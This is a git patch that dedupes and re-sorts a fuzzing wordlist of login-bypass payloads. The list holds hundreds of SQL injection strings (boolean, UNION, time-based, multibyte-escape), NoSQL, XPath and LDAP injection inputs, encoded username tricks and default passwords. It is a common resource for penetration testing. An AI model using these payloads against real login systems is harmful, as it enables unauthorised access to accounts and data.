From fef579420a0bb66ad61bf6365535ec8df81ccbde Mon Sep 17 00:00:00 2001
From: ItsIgnacioPortal <5990@protonmail.com>
Date: Thu, 27 Nov 2025 22:16:50 -0300
Subject: [PATCH] chore(wordlist): Removed duplicates from login_bypass.txt
---
Fuzzing/login_bypass.txt | 1732 +++++++++++++++++++-------------------
1 file changed, 864 insertions(+), 868 deletions(-)
diff --git a/Fuzzing/login_bypass.txt b/Fuzzing/login_bypass.txt
index bc1b8481..971359d4 100644
--- a/Fuzzing/login_bypass.txt
+++ b/Fuzzing/login_bypass.txt
@@ -1,901 +1,897 @@ -admin% -%admin -%admin% -_admin -admin_ -a_min -a%min -aaaaaaaaaaaaaaaa -admin00000000000 -adminxxxxxxxxxxx -admin\x00\x00\x00\x00 -admin%20 -admin%09 -admin%0a -admin%0d -admin+ -admin%2b -%20admin -%09admin%20 -\u0061dmin -\u0070assword -ad\u006din -\u0041dmin -\u0061\u0064\u006d\u0069\u006e -\uFF41dmin -%c0%61dmin -%e0%80%61dmin -admin%00 -admin\x00 -admin\0 -admin%00'-- -admin\x00'-- -admin%00"-- -admin%00' OR '1'='1 -admin\0' OR '1'='1 -password%00 -password\x00 -admin' AND SLEEP(5)-- -admin' AND SLEEP(10)# -admin' AND BENCHMARK(1000000,MD5('test'))-- -admin' WAITFOR DELAY '0:0:5'-- -admin' WAITFOR DELAY '0:0:10'# -admin' AND pg_sleep(5)-- -admin'; SELECT pg_sleep(10)-- -admin' UNION SELECT IF(1=1,SLEEP(5),0)-- -admin') AND SLEEP(5)-- -admin") AND SLEEP(5)-- -admin' AND 'x'<>'y -admin' AND 1<2-- -admin' AND 2>1-- -admin' AND 3<>4# -admin' AND EXISTS(SELECT * FROM users)-- -admin' AND NOT EXISTS(SELECT * FROM fake_table)-- -admin' AND LENGTH('a')=1-- -admin' AND ASCII('a')=97-- -admin') AND 'x'='x -admin") AND "x"="x -AdMiN -ADMIN -aDmIn -AdMiN'-- -ADMIN'-- -aDmIn'# -AdMiN"-- -ADMIN"-- -aDmIn"# -AdMiN'oR'1'='1 -ADMIN'oR'1'='1 -admin -password -1234 -123456 -root -toor -test -guest -QNKCDZO -aabg7XSs -[$ne]=toto -[$regex]=a.* -{"$ne": null} -{"$ne": "bar"} -{"$gt": undefined} -' or '1'='1 -' or ''=' -' or 1]%00 -' or /* or ' -' or "a" or ' -' or 1 or ' -' or true() or ' -'or string-length(name(.))<10 or' -'or contains(name,'adm') or' -'or contains(.,'adm') or' -'or position()=2 or' -admin' or ' -admin' or '1'='2 -* -*)(& -*)(|(& -pwd) -*)(|(* -*))%00 -admin)(&) -pwd -admin)(!(&(| -pwd)) -admin))(|(| -1234 -'-' -' ' -'&' -'^' -'*' -' or ''-' -' or '' ' -' or ''&' -' or ''^' -' or ''*' -"-" -" " -"&" -"^" -"*" -" or ""-" -" or "" " -" or ""&" -" or ""^" -" or ""*" -or true-- -" or true-- -' or true-- -") or true-- -') or true-- -' or 'x'='x -') or ('x')=('x -')) or (('x'))=(('x -" or "x"="x -") or ("x")=("x -")) or (("x"))=(("x -or 1=1 -or 
1=1-- -or 1=1# -or 1=1/* -admin' -- -admin' # -admin'/* -admin' or '1'='1 -admin' or '1'='1'-- -admin' or '1'='1'# -admin' or '1'='1'/* -admin'or 1=1 or ''=' -admin' or 1=1 -admin' or 1=1-- -admin' or 1=1# -admin' or 1=1/* -admin') or ('1'='1 -admin') or ('1'='1'-- -admin') or ('1'='1'# -admin') or ('1'='1'/* -admin') or '1'='1 -admin') or '1'='1'-- -admin') or '1'='1'# -admin') or '1'='1'/* -1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 -1234 ' AND 1=0 UNION ALL SELECT 'admin', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220 -admin" -- -admin" # -admin"/* -admin" or "1"="1 -admin" or "1"="1"-- -admin" or "1"="1"# -admin" or "1"="1"/* -admin"or 1=1 or ""=" -admin" or 1=1 -admin" or 1=1-- -admin" or 1=1# -admin" or 1=1/* -admin") or ("1"="1 -admin") or ("1"="1"-- -admin") or ("1"="1"# -admin") or ("1"="1"/* -admin") or "1"="1 -admin") or "1"="1"-- -admin") or "1"="1"# -admin") or "1"="1"/* -1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 -1234 " AND 1=0 UNION ALL SELECT "admin", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220 -== -= -' -' -- -' # -' – -'-- -'/* -'# -" -- -" # -"/* -' and 1='1 -' and a='a -or true -' or ''=' -" or ""=" -1′) and '1′='1– -' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 -" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 -' AND 1=0 UNION ALL SELECT '', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220 -" AND 1=0 UNION ALL SELECT "", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220 -and 1=1 -and 1=1– -' and 'one'='one -' and 'one'='one– -' group by password having 1=1-- -' group by userid having 1=1-- -' group by username having 1=1-- -like '%' -or 0=0 -- -or 0=0 # -or 0=0 – -' or 0=0 # -' or 0=0 -- -' or 0=0 # -' or 0=0 – -" or 0=0 -- -" or 0=0 # -" or 0=0 – -%' or '0'='0 -or 1=1– -' or 1=1-- -' or '1'='1 -' or '1'='1'-- -' or '1'='1'/* -' or '1'='1'# -' or '1′='1 -' or 1=1 -' or 1=1 -- -' or 1=1 – -' or 1=1;# -' or 1=1/* -' or 1=1# -' or 1=1– -') or '1'='1 -') or '1'='1-- -') 
or '1'='1'-- -') or '1'='1'/* -') or '1'='1'# -') or ('1'='1 -') or ('1'='1-- -') or ('1'='1'-- -') or ('1'='1'/* -') or ('1'='1'# -'or'1=1 -'or'1=1′ -" or "1"="1 -" or "1"="1"-- -" or "1"="1"/* -" or "1"="1"# -" or 1=1 -" or 1=1 -- -" or 1=1 – -" or 1=1-- -" or 1=1/* -" or 1=1# -" or 1=1– -") or "1"="1 -") or "1"="1"-- -") or "1"="1"/* -") or "1"="1"# -") or ("1"="1 -") or ("1"="1"-- -") or ("1"="1"/* -") or ("1"="1"# -) or '1′='1– -) or ('1′='1– -' or 1=1 LIMIT 1;# -'or 1=1 or ''=' -"or 1=1 or ""=" -' or a=a-- -' or a=a– -" or "a"="a -") or ("a"="a -') or ('a'='a and hi") or ("a"="a -' or 'one'='one -' or 'one'='one– -' or uid like '% -' or uname like '% -' or userid like '% -' or user like '% -' or username like '% -') or ('x'='x -' OR 'x'='x'#; -'=' 'or' and '=' 'or' -' UNION ALL SELECT 1, @@version;# -' UNION ALL SELECT system_user(),user();# -' UNION select table_schema,table_name FROM information_Schema.tables;# -admin' and substring(password/text(),1,1)='7 -' and substring(password/text(),1,1)='7 + " -'-- 2 -"-- 2 -'=' -0'<'2 -"=" -0"<"2 -') -") -')-- 2 -')/* -')# -")-- 2 -") # -")/* -')-(' -')&(' -')^(' -')*(' -')=(' -0')<('2 -")-(" -")&(" -")^(" -")*(" -")=(" -0")<("2 -'-''-- 2 -'-''# -'-''/* -'&''-- 2 -'&''# -'&''/* -'^''-- 2 -'^''# -'^''/* -'*''-- 2 -'*''# -'*''/* -'=''-- 2 -'=''# -'=''/* -0'<'2'-- 2 -0'<'2'# -0'<'2'/* -"-""-- 2 -"-""# -"-""/* -"&""-- 2 -"&""# -"&""/* -"^""-- 2 -"^""# -"^""/* -"*""-- 2 -"*""# -"*""/* -"=""-- 2 -"=""# -"=""/* -0"<"2"-- 2 -0"<"2"# -0"<"2"/* -')-''-- 2 -')-''# -')-''/* -')&''-- 2 -')&''# -')&''/* -')^''-- 2 -')^''# -')^''/* -')*''-- 2 -')*''# -')*''/* -')=''-- 2 -')=''# -')=''/* -0')<'2'-- 2 -0')<'2'# -0')<'2'/* -")-""-- 2 -")-""# -")-""/* -")&""-- 2 -")&""# -")&""/* -")^""-- 2 -")^""# -")^""/* -")*""-- 2 -")*""# -")*""/* -")=""-- 2 -")=""# -")=""/* -0")<"2-- 2 -0")<"2# -0")<"2/* -'oR'2 -'oR'2'-- 2 -'oR'2'# -'oR'2'/* -'oR'2'oR' -'oR(2)-- 2 -'oR(2)# -'oR(2)/* -'oR(2)oR' -'oR 2-- 2 -'oR 2# -'oR 2/* -'oR 2 oR' -'oR/**/2-- 2 
-'oR/**/2# -'oR/**/2/* -'oR/**/2/**/oR' -"oR"2 -"oR"2"-- 2 -"oR"2"# -"oR"2"/* -"oR"2"oR" -"oR(2)-- 2 -"oR(2)# -"oR(2)/* -"oR(2)oR" -"oR 2-- 2 -"oR 2# -"oR 2/* -"oR 2 oR" -"oR/**/2-- 2 -"oR/**/2# -"oR/**/2/* -"oR/**/2/**/oR" -'oR'2'='2 -'oR'2'='2'oR' -'oR'2'='2'-- 2 -'oR'2'='2'# -'oR'2'='2'/* -'oR 2=2-- 2 -'oR 2=2# -'oR 2=2/* -'oR 2=2 oR' -'oR/**/2=2-- 2 -'oR/**/2=2# -'oR/**/2=2/* -'oR/**/2=2/**/oR' -'oR(2)=2-- 2 -'oR(2)=2# -'oR(2)=2/* -'oR(2)=(2)oR' -'oR'2'='2' LimIT 1-- 2 -'oR'2'='2' LimIT 1# -'oR'2'='2' LimIT 1/* -'oR(2)=(2)LimIT(1)-- 2 -'oR(2)=(2)LimIT(1)# -'oR(2)=(2)LimIT(1)/* -"oR"2"="2 -"oR"2"="2"oR" -"oR"2"="2"-- 2 -"oR"2"="2"# -"oR"2"="2"/* -"oR 2=2-- 2 -"oR 2=2# -"oR 2=2/* -"oR 2=2 oR" -"oR/**/2=2-- 2 -"oR/**/2=2# -"oR/**/2=2/* -"oR/**/2=2/**/oR" -"oR(2)=2-- 2 -"oR(2)=2# -"oR(2)=2/* -"oR(2)=(2)oR" -"oR"2"="2" LimIT 1-- 2 -"oR"2"="2" LimIT 1# -"oR"2"="2" LimIT 1/* -"oR(2)=(2)LimIT(1)-- 2 -"oR(2)=(2)LimIT(1)# -"oR(2)=(2)LimIT(1)/* -'oR true-- 2 -'oR true# -'oR true/* -'oR true oR' -'oR(true)-- 2 -'oR(true)# -'oR(true)/* -'oR(true)oR' -'oR/**/true-- 2 -'oR/**/true# -'oR/**/true/* -'oR/**/true/**/oR' -"oR true-- 2 -"oR true# -"oR true/* -"oR true oR" -"oR(true)-- 2 -"oR(true)# -"oR(true)/* -"oR(true)oR" -"oR/**/true-- 2 -"oR/**/true# -"oR/**/true/* -"oR/**/true/**/oR" -'oR'2'LiKE'2 -'oR'2'LiKE'2'-- 2 -'oR'2'LiKE'2'# -'oR'2'LiKE'2'/* -'oR'2'LiKE'2'oR' -'oR(2)LiKE(2)-- 2 -'oR(2)LiKE(2)# -'oR(2)LiKE(2)/* -'oR(2)LiKE(2)oR' -"oR"2"LiKE"2 -"oR"2"LiKE"2"-- 2 -"oR"2"LiKE"2"# -"oR"2"LiKE"2"/* -"oR"2"LiKE"2"oR" -"oR(2)LiKE(2)-- 2 -"oR(2)LiKE(2)# -"oR(2)LiKE(2)/* -"oR(2)LiKE(2)oR" -admin -admin'-- 2 -admin'# -admin"-- 2 -admin"# -ffifdyop -' UniON SElecT 1,2-- 2 -' UniON SElecT 1,2,3-- 2 -' UniON SElecT 1,2,3,4-- 2 -' UniON SElecT 1,2,3,4,5-- 2 -' UniON SElecT 1,2# -' UniON SElecT 1,2,3# -' UniON SElecT 1,2,3,4# -' UniON SElecT 1,2,3,4,5# -'UniON(SElecT(1),2)-- 2 -'UniON(SElecT(1),2,3)-- 2 -'UniON(SElecT(1),2,3,4)-- 2 -'UniON(SElecT(1),2,3,4,5)-- 2 -'UniON(SElecT(1),2)# 
-'UniON(SElecT(1),2,3)# -'UniON(SElecT(1),2,3,4)# -'UniON(SElecT(1),2,3,4,5)# -" UniON SElecT 1,2-- 2 -" UniON SElecT 1,2,3-- 2 -" UniON SElecT 1,2,3,4-- 2 -" UniON SElecT 1,2,3,4,5-- 2 +" " +" # +" -- +" AND 1=0 UNION ALL SELECT "", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220 +" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 +" UnION SELeCT 1,2,3,4,5` +" UnION SELeCT 1,2,3,4` +" UnION SELeCT 1,2,3` +" UnION SELeCT 1,2` " UniON SElecT 1,2# " UniON SElecT 1,2,3# " UniON SElecT 1,2,3,4# " UniON SElecT 1,2,3,4,5# -"UniON(SElecT(1),2)-- 2 -"UniON(SElecT(1),2,3)-- 2 -"UniON(SElecT(1),2,3,4)-- 2 -"UniON(SElecT(1),2,3,4,5)-- 2 -"UniON(SElecT(1),2)# -"UniON(SElecT(1),2,3)# -"UniON(SElecT(1),2,3,4)# -"UniON(SElecT(1),2,3,4,5)# -'||'2 -'||2-- 2 -'||'2'||' -'||2# -'||2/* -'||2||' -"||"2 -"||2-- 2 -"||"2"||" -"||2# -"||2/* -"||2||" -'||'2'='2 -'||'2'='2'||' -'||2=2-- 2 -'||2=2# -'||2=2/* -'||2=2||' -"||"2"="2 -"||"2"="2"||" -"||2=2-- 2 -"||2=2# -"||2=2/* -"||2=2||" -'||2=(2)LimIT(1)-- 2 -'||2=(2)LimIT(1)# -'||2=(2)LimIT(1)/* -"||2=(2)LimIT(1)-- 2 -"||2=(2)LimIT(1)# -"||2=(2)LimIT(1)/* -'||true-- 2 -'||true# -'||true/* -'||true||' -"||true-- 2 -"||true# -"||true/* -"||true||" -'||'2'LiKE'2 -'||'2'LiKE'2'-- 2 -'||'2'LiKE'2'# -'||'2'LiKE'2'/* -'||'2'LiKE'2'||' -'||(2)LiKE(2)-- 2 -'||(2)LiKE(2)# -'||(2)LiKE(2)/* -'||(2)LiKE(2)||' -"||"2"LiKE"2 -"||"2"LiKE"2"-- 2 -"||"2"LiKE"2"# -"||"2"LiKE"2"/* -"||"2"LiKE"2"||" -"||(2)LiKE(2)-- 2 -"||(2)LiKE(2)# -"||(2)LiKE(2)/* -"||(2)LiKE(2)||" -')oR('2 -')oR'2'-- 2 -')oR'2'# -')oR'2'/* -')oR'2'oR(' -')oR(2)-- 2 -')oR(2)# -')oR(2)/* -')oR(2)oR(' -')oR 2-- 2 -')oR 2# -')oR 2/* -')oR 2 oR(' -')oR/**/2-- 2 -')oR/**/2# -')oR/**/2/* -')oR/**/2/**/oR(' -")oR("2 -")oR"2"-- 2 -")oR"2"# -")oR"2"/* -")oR"2"oR(" -")oR(2)-- 2 -")oR(2)# -")oR(2)/* -")oR(2)oR(" -")oR 2-- 2 -")oR 2# -")oR 2/* -")oR 2 oR(" -")oR/**/2-- 2 -")oR/**/2# -")oR/**/2/* -")oR/**/2/**/oR(" -')oR'2'=('2 -')oR'2'='2'oR(' -')oR'2'='2'-- 2 -')oR'2'='2'# -')oR'2'='2'/* -')oR 
2=2-- 2 -')oR 2=2# -')oR 2=2/* -')oR 2=2 oR(' -')oR/**/2=2-- 2 -')oR/**/2=2# -')oR/**/2=2/* -')oR/**/2=2/**/oR(' -')oR(2)=2-- 2 -')oR(2)=2# -')oR(2)=2/* -')oR(2)=(2)oR(' -')oR'2'='2' LimIT 1-- 2 -')oR'2'='2' LimIT 1# -')oR'2'='2' LimIT 1/* -')oR(2)=(2)LimIT(1)-- 2 -')oR(2)=(2)LimIT(1)# -')oR(2)=(2)LimIT(1)/* -")oR"2"=("2 -")oR"2"="2"oR(" -")oR"2"="2"-- 2 -")oR"2"="2"# -")oR"2"="2"/* -")oR 2=2-- 2 -")oR 2=2# -")oR 2=2/* -")oR 2=2 oR(" -")oR/**/2=2-- 2 -")oR/**/2=2# -")oR/**/2=2/* -")oR/**/2=2/**/oR(" -")oR(2)=2-- 2 -")oR(2)=2# -")oR(2)=2/* -")oR(2)=(2)oR(" -")oR"2"="2" LimIT 1-- 2 -")oR"2"="2" LimIT 1# -")oR"2"="2" LimIT 1/* -")oR(2)=(2)LimIT(1)-- 2 -")oR(2)=(2)LimIT(1)# -")oR(2)=(2)LimIT(1)/* -')oR true-- 2 -')oR true# -')oR true/* -')oR true oR(' -')oR(true)-- 2 -')oR(true)# -')oR(true)/* -')oR(true)oR(' -')oR/**/true-- 2 -')oR/**/true# -')oR/**/true/* -')oR/**/true/**/oR(' -")oR true-- 2 -")oR true# -")oR true/* -")oR true oR(" -")oR(true)-- 2 -")oR(true)# -")oR(true)/* -")oR(true)oR(" -")oR/**/true-- 2 -")oR/**/true# -")oR/**/true/* -")oR/**/true/**/oR(" -')oR'2'LiKE('2 -')oR'2'LiKE'2'-- 2 -')oR'2'LiKE'2'# -')oR'2'LiKE'2'/* -')oR'2'LiKE'2'oR(' -')oR(2)LiKE(2)-- 2 -')oR(2)LiKE(2)# -')oR(2)LiKE(2)/* -')oR(2)LiKE(2)oR(' -")oR"2"LiKE("2 -")oR"2"LiKE"2"-- 2 -")oR"2"LiKE"2"# -")oR"2"LiKE"2"/* -")oR"2"LiKE"2"oR(" -")oR(2)LiKE(2)-- 2 -")oR(2)LiKE(2)# -")oR(2)LiKE(2)/* -")oR(2)LiKE(2)oR(" -admin')-- 2 -admin')# -admin')/* -admin")-- 2 -admin")# -') UniON SElecT 1,2-- 2 -') UniON SElecT 1,2,3-- 2 -') UniON SElecT 1,2,3,4-- 2 -') UniON SElecT 1,2,3,4,5-- 2 -') UniON SElecT 1,2# -') UniON SElecT 1,2,3# -') UniON SElecT 1,2,3,4# -') UniON SElecT 1,2,3,4,5# -')UniON(SElecT(1),2)-- 2 -')UniON(SElecT(1),2,3)-- 2 -')UniON(SElecT(1),2,3,4)-- 2 -')UniON(SElecT(1),2,3,4,5)-- 2 -')UniON(SElecT(1),2)# -')UniON(SElecT(1),2,3)# -')UniON(SElecT(1),2,3,4)# -')UniON(SElecT(1),2,3,4,5)# -") UniON SElecT 1,2-- 2 -") UniON SElecT 1,2,3-- 2 -") UniON SElecT 1,2,3,4-- 2 -") UniON SElecT 
1,2,3,4,5-- 2 +" UniON SElecT 1,2,3,4,5-- 2 +" UniON SElecT 1,2,3,4-- 2 +" UniON SElecT 1,2,3-- 2 +" UniON SElecT 1,2-- 2 +" or "" " +" or ""&" +" or ""*" +" or ""-" +" or ""=" +" or ""^" +" or "1"="1 +" or "1"="1"# +" or "1"="1"-- +" or "1"="1"/* +" or "a"="a +" or "x"="x +" or 0=0 # +" or 0=0 -- +" or 0=0 – +" or 1=1 +" or 1=1 -- +" or 1=1 – +" or 1=1# +" or 1=1-- +" or 1=1/* +" or 1=1– +" or true-- +"&" +"&""# +"&""-- 2 +"&""/* +") +") # ") UniON SElecT 1,2# ") UniON SElecT 1,2,3# ") UniON SElecT 1,2,3,4# ") UniON SElecT 1,2,3,4,5# -")UniON(SElecT(1),2)-- 2 -")UniON(SElecT(1),2,3)-- 2 -")UniON(SElecT(1),2,3,4)-- 2 -")UniON(SElecT(1),2,3,4,5)-- 2 +") UniON SElecT 1,2,3,4,5-- 2 +") UniON SElecT 1,2,3,4-- 2 +") UniON SElecT 1,2,3-- 2 +") UniON SElecT 1,2-- 2 +") or "1"="1 +") or "1"="1"# +") or "1"="1"-- +") or "1"="1"/* +") or ("1"="1 +") or ("1"="1"# +") or ("1"="1"-- +") or ("1"="1"/* +") or ("a"="a +") or ("x")=("x +") or true-- +")&""# +")&""-- 2 +")&""/* +")&(" +")) or (("x"))=(("x +")*""# +")*""-- 2 +")*""/* +")*(" +")-""# +")-""-- 2 +")-""/* +")-(" +")-- 2 +")/* +")=""# +")=""-- 2 +")=""/* +")=(" ")UniON(SElecT(1),2)# +")UniON(SElecT(1),2)-- 2 ")UniON(SElecT(1),2,3)# +")UniON(SElecT(1),2,3)-- 2 ")UniON(SElecT(1),2,3,4)# +")UniON(SElecT(1),2,3,4)-- 2 ")UniON(SElecT(1),2,3,4,5)# -')||('2 -')||2-- 2 -')||'2'||(' -')||2# -')||2/* -')||2||(' -")||("2 -")||2-- 2 -")||"2"||(" -")||2# -")||2/* -")||2||(" -')||'2'=('2 -')||'2'='2'||(' -')||2=2-- 2 -')||2=2# -')||2=2/* -')||2=2||(' -")||"2"=("2 +")UniON(SElecT(1),2,3,4,5)-- 2 +")^""# +")^""-- 2 +")^""/* +")^(" +")oR 2 oR(" +")oR 2# +")oR 2-- 2 +")oR 2/* +")oR 2=2 oR(" +")oR 2=2# +")oR 2=2-- 2 +")oR 2=2/* +")oR true oR(" +")oR true# +")oR true-- 2 +")oR true/* +")oR"2"# +")oR"2"-- 2 +")oR"2"/* +")oR"2"="2" LimIT 1# +")oR"2"="2" LimIT 1-- 2 +")oR"2"="2" LimIT 1/* +")oR"2"="2"# +")oR"2"="2"-- 2 +")oR"2"="2"/* +")oR"2"="2"oR(" +")oR"2"=("2 +")oR"2"LiKE"2"# +")oR"2"LiKE"2"-- 2 +")oR"2"LiKE"2"/* +")oR"2"LiKE"2"oR(" 
+")oR"2"LiKE("2 +")oR"2"oR(" +")oR("2 +")oR(2)# +")oR(2)-- 2 +")oR(2)/* +")oR(2)=(2)LimIT(1)# +")oR(2)=(2)LimIT(1)-- 2 +")oR(2)=(2)LimIT(1)/* +")oR(2)=(2)oR(" +")oR(2)=2# +")oR(2)=2-- 2 +")oR(2)=2/* +")oR(2)LiKE(2)# +")oR(2)LiKE(2)-- 2 +")oR(2)LiKE(2)/* +")oR(2)LiKE(2)oR(" +")oR(2)oR(" +")oR(true)# +")oR(true)-- 2 +")oR(true)/* +")oR(true)oR(" +")oR/**/2# +")oR/**/2-- 2 +")oR/**/2/* +")oR/**/2/**/oR(" +")oR/**/2=2# +")oR/**/2=2-- 2 +")oR/**/2=2/* +")oR/**/2=2/**/oR(" +")oR/**/true# +")oR/**/true-- 2 +")oR/**/true/* +")oR/**/true/**/oR(" ")||"2"="2"||(" -")||2=2-- 2 -")||2=2# -")||2=2/* -")||2=2||(" -')||2=(2)LimIT(1)-- 2 -')||2=(2)LimIT(1)# -')||2=(2)LimIT(1)/* -")||2=(2)LimIT(1)-- 2 -")||2=(2)LimIT(1)# -")||2=(2)LimIT(1)/* -')||true-- 2 -')||true# -')||true/* -')||true||(' -")||true-- 2 -")||true# -")||true/* -")||true||(" -')||'2'LiKE('2 -')||'2'LiKE'2'-- 2 -')||'2'LiKE'2'# -')||'2'LiKE'2'/* -')||'2'LiKE'2'||(' -')||(2)LiKE(2)-- 2 -')||(2)LiKE(2)# -')||(2)LiKE(2)/* -')||(2)LiKE(2)||(' -")||"2"LiKE("2 -")||"2"LiKE"2"-- 2 +")||"2"=("2 ")||"2"LiKE"2"# +")||"2"LiKE"2"-- 2 ")||"2"LiKE"2"/* ")||"2"LiKE"2"||(" -")||(2)LiKE(2)-- 2 +")||"2"LiKE("2 +")||"2"||(" +")||("2 ")||(2)LiKE(2)# +")||(2)LiKE(2)-- 2 ")||(2)LiKE(2)/* ")||(2)LiKE(2)||(" -' UnION SELeCT 1,2` -' UnION SELeCT 1,2,3` -' UnION SELeCT 1,2,3,4` +")||2# +")||2-- 2 +")||2/* +")||2=(2)LimIT(1)# +")||2=(2)LimIT(1)-- 2 +")||2=(2)LimIT(1)/* +")||2=2# +")||2=2-- 2 +")||2=2/* +")||2=2||(" +")||2||(" +")||true# +")||true-- 2 +")||true/* +")||true||(" +"*" +"*""# +"*""-- 2 +"*""/* +"-" +"-""# +"-""-- 2 +"-""/* +"-- 2 +"/* +";return(true);var xyz='a +"=" +"=""# +"=""-- 2 +"=""/* +"UniON(SElecT(1),2)# +"UniON(SElecT(1),2)-- 2 +"UniON(SElecT(1),2,3)# +"UniON(SElecT(1),2,3)-- 2 +"UniON(SElecT(1),2,3,4)# +"UniON(SElecT(1),2,3,4)-- 2 +"UniON(SElecT(1),2,3,4,5)# +"UniON(SElecT(1),2,3,4,5)-- 2 +"^" +"^""# +"^""-- 2 +"^""/* +"oR 2 oR" +"oR 2# +"oR 2-- 2 +"oR 2/* +"oR 2=2 oR" +"oR 2=2# +"oR 2=2-- 2 +"oR 2=2/* +"oR true oR" +"oR 
true# +"oR true-- 2 +"oR true/* +"oR"2 +"oR"2"# +"oR"2"-- 2 +"oR"2"/* +"oR"2"="2 +"oR"2"="2" LimIT 1# +"oR"2"="2" LimIT 1-- 2 +"oR"2"="2" LimIT 1/* +"oR"2"="2"# +"oR"2"="2"-- 2 +"oR"2"="2"/* +"oR"2"="2"oR" +"oR"2"LiKE"2 +"oR"2"LiKE"2"# +"oR"2"LiKE"2"-- 2 +"oR"2"LiKE"2"/* +"oR"2"LiKE"2"oR" +"oR"2"oR" +"oR(2)# +"oR(2)-- 2 +"oR(2)/* +"oR(2)=(2)LimIT(1)# +"oR(2)=(2)LimIT(1)-- 2 +"oR(2)=(2)LimIT(1)/* +"oR(2)=(2)oR" +"oR(2)=2# +"oR(2)=2-- 2 +"oR(2)=2/* +"oR(2)LiKE(2)# +"oR(2)LiKE(2)-- 2 +"oR(2)LiKE(2)/* +"oR(2)LiKE(2)oR" +"oR(2)oR" +"oR(true)# +"oR(true)-- 2 +"oR(true)/* +"oR(true)oR" +"oR/**/2# +"oR/**/2-- 2 +"oR/**/2/* +"oR/**/2/**/oR" +"oR/**/2=2# +"oR/**/2=2-- 2 +"oR/**/2=2/* +"oR/**/2=2/**/oR" +"oR/**/true# +"oR/**/true-- 2 +"oR/**/true/* +"oR/**/true/**/oR" +"or 1=1 or ""=" +"||"2 +"||"2"="2 +"||"2"="2"||" +"||"2"LiKE"2 +"||"2"LiKE"2"# +"||"2"LiKE"2"-- 2 +"||"2"LiKE"2"/* +"||"2"LiKE"2"||" +"||"2"||" +"||(2)LiKE(2)# +"||(2)LiKE(2)-- 2 +"||(2)LiKE(2)/* +"||(2)LiKE(2)||" +"||2# +"||2-- 2 +"||2/* +"||2=(2)LimIT(1)# +"||2=(2)LimIT(1)-- 2 +"||2=(2)LimIT(1)/* +"||2=2# +"||2=2-- 2 +"||2=2/* +"||2=2||" +"||2||" +"||true# +"||true-- 2 +"||true/* +"||true||" +$where: '1 == 1' +%' or '0'='0 +%09admin%20 +%20admin +%8C%A8%27 Or 1-- 2 +%8C%A8%27 Or 1=1-- 2 +%8C%A8%27) Or 1-- 2 +%8C%A8%27) Or 1=1-- 2 +%8C%A8%27)Or(1)-- 2 +%8C%A8%27)||1-- 2 +%8C%A8%27Or(1)-- 2 +%8C%A8%27||1-- 2 +%A8%27 Or 1-- 2 +%A8%27 Or 1=1-- 2 +%A8%27) Or 1-- 2 +%A8%27) Or 1=1-- 2 +%A8%27)Or(1)-- 2 +%A8%27)||1-- 2 +%A8%27Or(1)-- 2 +%A8%27||1-- 2 +%admin +%admin% +%bf' Or 1-- 2 +%bf' Or 1=1 -- 2 +%bf') Or 1-- 2 +%bf') Or 1=1 -- 2 +%bf')Or(1)-- 2 +%bf')||1-- 2 +%bf'Or(1)-- 2 +%bf'||1-- 2 +%c0%61dmin +%e0%80%61dmin +' +' # +' && this.password.match(/.*/)//+%00 +' && this.passwordzz.match(/.*/)//+%00 +' ' +' -- +' AND 1=0 UNION ALL SELECT '', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220 +' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 +' OR 'x'='x'#; +' UNION ALL SELECT 1, @@version;# +' UNION ALL 
SELECT system_user(),user();# +' UNION select table_schema,table_name FROM information_Schema.tables;# ' UnION SELeCT 1,2,3,4,5` -" UnION SELeCT 1,2` -" UnION SELeCT 1,2,3` -" UnION SELeCT 1,2,3,4` -" UnION SELeCT 1,2,3,4,5` +' UnION SELeCT 1,2,3,4` +' UnION SELeCT 1,2,3` +' UnION SELeCT 1,2` +' UniON SElecT 1,2# +' UniON SElecT 1,2,3# +' UniON SElecT 1,2,3,4# +' UniON SElecT 1,2,3,4,5# +' UniON SElecT 1,2,3,4,5-- 2 +' UniON SElecT 1,2,3,4-- 2 +' UniON SElecT 1,2,3-- 2 +' UniON SElecT 1,2-- 2 +' and 'one'='one +' and 'one'='one– +' and 1='1 +' and a='a +' and substring(password/text(),1,1)='7 +' group by password having 1=1-- +' group by userid having 1=1-- +' group by username having 1=1-- +' or 0=0 # +' or "a" or ' +' or '' ' +' or ''&' +' or ''*' +' or ''-' +' or ''=' +' or ''^' +' or '1'='1 +' or '1'='1'# +' or '1'='1'-- +' or '1'='1'/* +' or '1′='1 +' or 'one'='one +' or 'one'='one– +' or 'x'='x +' or /* or ' +' or 0=0 # +' or 0=0 -- +' or 0=0 – +' or 1 or ' +' or 1=1 +' or 1=1 -- +' or 1=1 LIMIT 1;# ' or 1=1 limit 1 -- -+ +' or 1=1 – +' or 1=1# +' or 1=1-- +' or 1=1/* +' or 1=1;# +' or 1=1– +' or 1]%00 +' or a=a-- +' or a=a– +' or true() or ' +' or true-- +' or uid like '% +' or uname like '% +' or user like '% +' or userid like '% +' or username like '% +' } ], $comment:'successful MongoDB injection' +' – +'# +'%20%26%26%20this.password.match(/.*/)//+%00 +'%20%26%26%20this.passwordzz.match(/.*/)//+%00 +'&' +'&''# +'&''-- 2 +'&''/* +') +') UniON SElecT 1,2# +') UniON SElecT 1,2,3# +') UniON SElecT 1,2,3,4# +') UniON SElecT 1,2,3,4,5# +') UniON SElecT 1,2,3,4,5-- 2 +') UniON SElecT 1,2,3,4-- 2 +') UniON SElecT 1,2,3-- 2 +') UniON SElecT 1,2-- 2 +') or '1'='1 +') or '1'='1'# +') or '1'='1'-- +') or '1'='1'/* +') or '1'='1-- +') or ('1'='1 +') or ('1'='1'# +') or ('1'='1'-- +') or ('1'='1'/* +') or ('1'='1-- +') or ('a'='a and hi") or ("a"="a +') or ('x')=('x +') or ('x'='x +') or true-- +')# +')&''# +')&''-- 2 +')&''/* +')&(' +')) or (('x'))=(('x +')*''# 
